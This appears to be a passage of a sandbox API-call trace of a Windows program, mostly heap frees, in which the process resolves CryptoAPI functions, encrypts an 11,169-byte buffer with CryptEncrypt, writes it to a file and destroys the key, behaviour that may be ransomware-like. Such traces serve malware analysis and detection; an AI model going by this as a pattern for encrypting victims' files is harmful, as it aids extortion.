[0130.130] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0130.130] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad90 | out: hHeap=0x1780000) returned 1 [0130.130] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0130.130] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb018 | out: hHeap=0x1780000) returned 1 [0130.130] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0130.130] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae38 | out: hHeap=0x1780000) returned 1 [0130.130] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0130.130] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb018 | out: hHeap=0x1780000) returned 1 [0130.130] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0130.130] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad90 | out: hHeap=0x1780000) returned 1 [0130.130] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0130.130] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb018 | out: hHeap=0x1780000) returned 1 [0130.130] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0130.130] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae38 | out: hHeap=0x1780000) returned 1 [0130.130] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0130.131] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae38 | out: hHeap=0x1780000) returned 1 [0130.131] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0130.131] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae98 | out: hHeap=0x1780000) returned 1 [0130.131] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0130.131] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0130.131] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796d68, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0130.131] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb018 | out: hHeap=0x1780000) returned 1 [0130.131] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d68 | out: hHeap=0x1780000) returned 1 [0130.131] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0130.131] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff40 | out: hHeap=0x1780000) returned 1 [0130.131] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0130.131] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0130.131] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0130.131] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0130.131] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0130.131] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0130.131] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0148 | out: hHeap=0x1780000) returned 1 [0130.131] CryptGetKeyParam (in: hKey=0x41ac740, dwParam=0x7, pbData=0x43e2ac0, pdwDataLen=0x144e008, dwFlags=0x0 | out: pbData=0x43e2ac0*=0x6610, pdwDataLen=0x144e008*=0x4) returned 1 [0130.131] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae98 | out: hHeap=0x1780000) returned 1 [0130.131] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0130.131] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad90 | out: hHeap=0x1780000) returned 1 [0130.131] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae38 | out: hHeap=0x1780000) returned 1 [0130.131] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0130.131] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad90 | out: hHeap=0x1780000) returned 1 [0130.131] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1f8 | out: hHeap=0x1780000) returned 1 [0130.131] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0130.132] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae38 | out: hHeap=0x1780000) returned 1 [0130.132] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0f0 | out: hHeap=0x1780000) returned 1 [0130.132] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0130.132] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb108 | out: hHeap=0x1780000) returned 1 [0130.132] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb180 | out: hHeap=0x1780000) returned 1 [0130.132] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0130.132] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0c0 | out: hHeap=0x1780000) returned 1 [0130.132] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb108 | out: hHeap=0x1780000) returned 1 [0130.132] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0130.132] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1b0 | out: hHeap=0x1780000) returned 1 [0130.132] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0130.132] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0130.132] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0130.132] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0130.132] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0130.132] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0170 | out: hHeap=0x1780000) returned 1 [0130.132] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb000 | out: hHeap=0x1780000) returned 1 [0130.132] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0130.132] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb078 | out: hHeap=0x1780000) returned 1 [0130.132] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb030 | out: hHeap=0x1780000) returned 1 [0130.132] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0130.132] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadc0 | out: hHeap=0x1780000) returned 1 [0130.132] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae20 | out: hHeap=0x1780000) returned 1 [0130.132] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf10 | out: hHeap=0x1780000) returned 1 [0130.132] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf40 | out: hHeap=0x1780000) returned 1 [0130.132] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae50 | out: hHeap=0x1780000) returned 1 [0130.132] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caef8 | out: hHeap=0x1780000) returned 1 [0130.132] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae68 | out: hHeap=0x1780000) returned 1 [0130.132] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0130.132] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf28 | out: hHeap=0x1780000) returned 1 [0130.132] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafa0 | out: hHeap=0x1780000) returned 1 [0130.132] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafb8 | out: hHeap=0x1780000) returned 1 [0130.132] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0130.133] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0130.133] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e28 | out: hHeap=0x1780000) returned 1 [0130.133] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb060 | out: hHeap=0x1780000) returned 1 [0130.133] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadf0 | out: hHeap=0x1780000) returned 1 [0130.133] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadd8 | out: hHeap=0x1780000) returned 1 [0130.133] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0130.133] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafe8 | out: hHeap=0x1780000) returned 1 [0130.133] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafd0 | out: hHeap=0x1780000) returned 1 [0130.133] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae08 | out: hHeap=0x1780000) returned 1 [0130.133] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0130.133] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0130.133] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0130.133] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae68 | out: hHeap=0x1780000) returned 1 [0130.133] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e8f00 | out: hHeap=0x1780000) returned 1 [0130.133] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0130.133] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0130.133] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0130.133] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafb8 | out: hHeap=0x1780000) returned 1 [0130.133] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea6b8 | out: hHeap=0x1780000) returned 1 [0130.133] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0130.133] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0130.133] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0130.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0130.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0130.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0130.134] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0130.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0130.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0130.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0130.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0130.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0130.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0130.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0130.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadf0 | out: hHeap=0x1780000) returned 1 [0130.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0130.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0130.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e28 | out: hHeap=0x1780000) returned 1 [0130.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb078 | out: hHeap=0x1780000) returned 1 [0130.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf28 | out: hHeap=0x1780000) returned 1 [0130.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff90 | out: hHeap=0x1780000) returned 1 [0130.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0130.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac000 | out: hHeap=0x1780000) returned 1 [0130.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0130.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb018 | out: hHeap=0x1780000) returned 1 [0130.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae98 | out: hHeap=0x1780000) returned 1 [0130.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad90 | out: hHeap=0x1780000) returned 1 [0130.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb138 | out: hHeap=0x1780000) returned 1 [0130.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0130.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2c08 | out: hHeap=0x1780000) returned 1 [0130.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0130.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae38 | out: hHeap=0x1780000) returned 1 [0130.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1c8 | out: hHeap=0x1780000) returned 1 [0130.134] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1e0 | out: hHeap=0x1780000) returned 1 [0130.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0130.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e97a0 | out: hHeap=0x1780000) returned 1 [0130.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0130.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf70 | out: hHeap=0x1780000) returned 1 [0130.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf58 | out: hHeap=0x1780000) returned 1 [0130.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0130.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff18 | out: hHeap=0x1780000) returned 1 [0130.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb060 | out: hHeap=0x1780000) returned 1 [0130.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd88 | out: hHeap=0x1780000) returned 1 [0130.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0130.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff40 | out: hHeap=0x1780000) returned 1 [0130.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafa0 | out: hHeap=0x1780000) returned 1 [0130.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae50 | out: hHeap=0x1780000) returned 1 [0130.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0130.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01e8 | out: hHeap=0x1780000) returned 1 [0130.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caeb0 | out: hHeap=0x1780000) returned 1 [0130.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00d0 | out: hHeap=0x1780000) returned 1 [0130.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0130.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00a8 | out: hHeap=0x1780000) returned 1 [0130.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb048 | out: hHeap=0x1780000) returned 1 [0130.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2930 | out: hHeap=0x1780000) returned 1 [0130.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2728 | out: hHeap=0x1780000) returned 1 [0130.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0130.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0130.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797048 | out: hHeap=0x1780000) returned 1 [0130.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf88 | out: hHeap=0x1780000) returned 1 [0130.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caec8 | out: hHeap=0x1780000) returned 1 [0130.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0130.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0080 | out: hHeap=0x1780000) returned 1 [0130.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0130.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0130.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdd8 | out: hHeap=0x1780000) returned 1 [0130.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0130.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0130.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0130.136] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0130.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e8cd8 | out: hHeap=0x1780000) returned 1 [0130.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0130.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0130.136] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0130.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ec8 | out: hHeap=0x1780000) returned 1 [0130.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0130.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0130.136] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0130.136] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0130.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41abfc0 | out: hHeap=0x1780000) returned 1 [0130.136] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0130.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0130.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0130.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0130.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae98 | out: hHeap=0x1780000) returned 1 [0130.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0130.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf28 | out: hHeap=0x1780000) returned 1 [0130.136] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0130.136] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0130.136] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0130.136] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0130.137] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0130.137] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0130.137] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cb0d8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0130.137] CryptEncrypt (in: hKey=0x41ac740, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e538*=0x2b91, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e538*=0x2ba0) returned 1 [0130.137] CharLowerBuffW (in: lpsz="byte[11169]", cchLength=0xb | out: lpsz="byte[11169]") returned 0xb [0130.137] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0130.137] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0130.137] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0130.137] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cb3a8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0130.137] CryptEncrypt (in: hKey=0x41ac740, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x49af750*, pdwDataLen=0x144e538*=0x2b91, dwBufLen=0x2ba0 | out: pbData=0x49af750*, pdwDataLen=0x144e538*=0x2ba0) returned 1 [0130.137] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0130.137] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0130.137] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0130.137] WriteFile (in: hFile=0x258, lpBuffer=0x49aa010*, nNumberOfBytesToWrite=0x2ba0, lpNumberOfBytesWritten=0x144ef3c, lpOverlapped=0x0 | out: lpBuffer=0x49aa010*, lpNumberOfBytesWritten=0x144ef3c*=0x2ba0, lpOverlapped=0x0) returned 1 [0130.139] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0130.139] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0130.139] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0130.139] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0130.139] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43caee0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0130.139] CryptDestroyKey (hKey=0x41ac740) returned 1 [0130.139] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0130.139] 